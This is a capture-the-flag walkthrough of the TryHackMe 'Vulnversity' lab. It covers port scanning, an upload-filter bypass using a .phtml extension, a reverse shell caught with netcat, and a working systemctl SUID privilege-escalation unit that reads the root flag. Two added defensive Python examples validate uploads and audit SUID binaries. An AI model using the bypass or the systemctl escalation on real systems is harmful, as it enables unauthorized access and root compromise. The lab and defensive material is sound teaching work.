Vulnversity TryHackMe Walkthrough
Challenge Link: https://tryhackme.com/room/vulnversity
Enumerating and Initial Access
We begin our enumeration with an Nmap port scan, using service version detection and checking the default scripts.
m1m3@kali:~$ nmap -sV -oA nmap/vulnversity 10.10.160.174
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.160.174
Host is up (0.26s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.26 seconds
We see an Apache web server running on port 3333. Let’s fire up our browser and see what we have there.
Next, we run a gobuster scan to search for directories.
m1m3@kali:~$ gobuster dir -u http://10.10.160.174:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.160.174:3333
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)
We found some directories. Opening the ‘/internal/’ directory reveals an upload form!
The first thing to check in an upload form is which file extensions it accepts. To fuzz the extensions we will use Burp Suite; its Intruder feature does the job in an automated fashion.
First, upload a file (it doesn’t really matter which one) and capture the request with the Burp Suite proxy. Then right-click the request and choose “Send to Intruder”. Open the “Positions” tab, find the filename and click “Add §” around the extension. It should look like this:
Now add the extensions to the list in the Payloads tab and disable the payload encoding option (otherwise Burp URL-encodes the dot in each extension).
As we can see, .phtml returns ‘Success’. The form rejects .php but the server still executes .phtml, because the Apache PHP module configuration that Ubuntu ships hands .php, .phtml and .phar files to the PHP handler. This is the extension we will be using for our web shell.
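To show the defender’s side of this finding, here is an added example (not code from the original post or from the TryHackMe room) of the two ways an upload form can check a filename: the denylist style that the /internal/ page evidently uses, which blocks only .php and is bypassed by .phtml, and an allowlist check that also refuses double extensions, path characters and content that does not match the claimed type. The filenames and byte strings are constructed samples; the set of executable extensions in the comment is what Ubuntu’s Apache PHP module config (php7.0.conf on 16.04) maps to the PHP handler.

```python
"""Added example: denylist versus allowlist validation for an upload form.
Filenames and file contents below are constructed samples, not data from
the target."""
import re

# Vulnerable check as many upload handlers implement it: only '.php' is
# refused. Apache on Ubuntu runs '.php', '.phtml' and '.phar' through PHP,
# so 'shell.phtml' sails through.
def denylist_is_allowed(filename: str) -> bool:
    return not filename.lower().endswith(".php")

# Hardened check: an allowlist of exact extensions, exactly one dot, no
# path separators, and the first bytes must match the type the extension
# claims. Extension comparison is case-insensitive because Apache's
# FilesMatch for PHP is too.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")

def allowlist_is_allowed(filename: str, content: bytes) -> bool:
    m = SAFE_NAME.match(filename)       # rejects 'a.php.png', '../x.png', 'x'
    if not m:
        return False
    ext = m.group(1).lower()            # '.PHTML' and '.phtml' are the same to Apache
    magic = ALLOWED.get(ext)
    return magic is not None and content.startswith(magic)

# Constructed uploads: (filename, leading bytes). The PHP bodies are
# harmless one-liners standing in for whatever an attacker would upload.
SAMPLES = [
    ("photo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("shell.php", b"<?php echo 1; ?>"),
    ("shell.phtml", b"<?php echo 1; ?>"),      # the bypass the Intruder run found
    ("shell.PHTML", b"<?php echo 1; ?>"),      # case variant
    ("shell.php.png", b"<?php echo 1; ?>"),    # double extension
    ("fake.png", b"<?php echo 1; ?>"),         # allowed extension, wrong content
]

def compare(samples=SAMPLES) -> dict:
    """Return {filename: (denylist verdict, allowlist verdict)}; True = accepted."""
    return {name: (denylist_is_allowed(name), allowlist_is_allowed(name, data))
            for name, data in samples}

if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:16} denylist={'allow' if weak else 'block':5} "
              f"allowlist={'allow' if strong else 'block'}")
```

Only photo.png passes the allowlist; every PHP variant that the denylist accepts is refused. Storing uploads outside the web root, or serving /internal/uploads/ with PHP execution disabled, is the second layer that makes a bypass of the name check harmless.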
I will use the web shell from Pentest Monkey; you can use any shell you like. Change the IP and port in the shell and upload it to the server. After uploading, we can find it at /internal/uploads/.
m1m3@kali:~$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.8.5.61] from (UNKNOWN) [10.10.160.174] 43684
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
10:15:00 up 2:29, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@vulnuniversity:/$
We now have a shell on the server and can read user.txt!
www-data@vulnuniversity:/$ cd /home/bill
cd /home/bill
www-data@vulnuniversity:/home/bill$ wc -c user.txt
wc -c user.txt
33 user.txt
www-data@vulnuniversity:/home/bill$
Privilege Escalation
This task is a little more challenging. For it we need to abuse a binary that has the SUID bit set. Let’s first look for files with the SUID bit set.
www-data@vulnuniversity:/bin$ find / -user root -perm -4000 -exec ls -ldb {} \; | grep -v proc
...
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
...
Looking at the output of the command, we can see that systemctl has the SUID bit set. Searching on GTFOBins, I found that we can exploit systemctl for privilege escalation. Copy and execute the following script from the /bin directory.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
Because the unit runs as root, this writes the contents of /root/root.txt to /tmp/output. Looking in /tmp, we can see a file named output, which holds our flag!
www-data@vulnuniversity:/bin$ wc -c /tmp/output
wc -c /tmp/output
33 /tmp/output
www-data@vulnuniversity:/bin$
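From the defender’s side, the SUID listing above is exactly what a periodic audit should catch. The following is an added example (not part of the original walkthrough) that parses ‘ls -l’ lines such as those produced by the find command used here, compares each SUID-root binary against a baseline of binaries expected to carry SUID on a stock Ubuntu 16.04 host, and flags anything else, escalating the finding when GTFOBins documents the binary as giving root once it is SUID. The listing is a constructed sample built from the lines shown above; the baseline and the GTFOBins subset are assumptions for the example, not authoritative lists.

```python
"""Added example: audit a SUID listing against an expected baseline.
The listing, baseline and GTFOBins subset are assumptions for this
example and should be replaced with the host's own package-verified data."""
import re
from dataclasses import dataclass

# Assumed baseline: SUID-root binaries a stock Ubuntu 16.04 install ships
# (trimmed to the paths that appear in the sample listing).
BASELINE = {"/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
            "/bin/fusermount", "/bin/ntfs-3g"}

# Assumed subset of binaries GTFOBins lists as yielding root when SUID.
GTFOBINS_SUID = {"systemctl", "find", "vim", "python", "bash", "env", "cp"}

# One 'ls -l' line: mode, links, owner, group, size, month, day, year|time, path.
LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)

# Constructed sample: the lines the walkthrough's find command printed.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
"""

@dataclass
class Finding:
    path: str
    reason: str
    fix: str

def parse_suid_root(listing: str) -> list:
    """Return paths from an 'ls -l' listing that are owned by root and SUID.
    The owner-execute column is 's' (SUID + exec) or 'S' (SUID without exec)."""
    paths = []
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if m and m.group("owner") == "root" and m.group("mode")[3] in "sS":
            paths.append(m.group("path"))
    return paths

def audit(listing: str = SAMPLE_LISTING) -> list:
    """Flag every SUID-root binary outside the baseline; note GTFOBins hits."""
    findings = []
    for path in parse_suid_root(listing):
        if path in BASELINE:
            continue
        name = path.rsplit("/", 1)[-1]
        reason = f"{name} is not in the SUID baseline"
        if name in GTFOBINS_SUID:
            reason += " and GTFOBins lists it as giving a root shell when SUID"
        findings.append(Finding(path, reason, f"chmod u-s {path}"))
    return findings

if __name__ == "__main__":
    for f in audit():
        print(f"{f.path}: {f.reason}\n    fix: {f.fix}")
```

On the sample listing the only finding is /bin/systemctl, which is the same conclusion the walkthrough reached by hand. In practice the baseline should come from the package manager (dpkg --verify reports mode changes on installed files) rather than a hard-coded set, and the find command itself can run from cron with its output diffed against the previous run.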
That’s it! Thanks for reading! Make sure to stay tuned for more upcoming TryHackMe walkthroughs!
NOTE: The awesome artwork used in this article was created by Christi du Toit.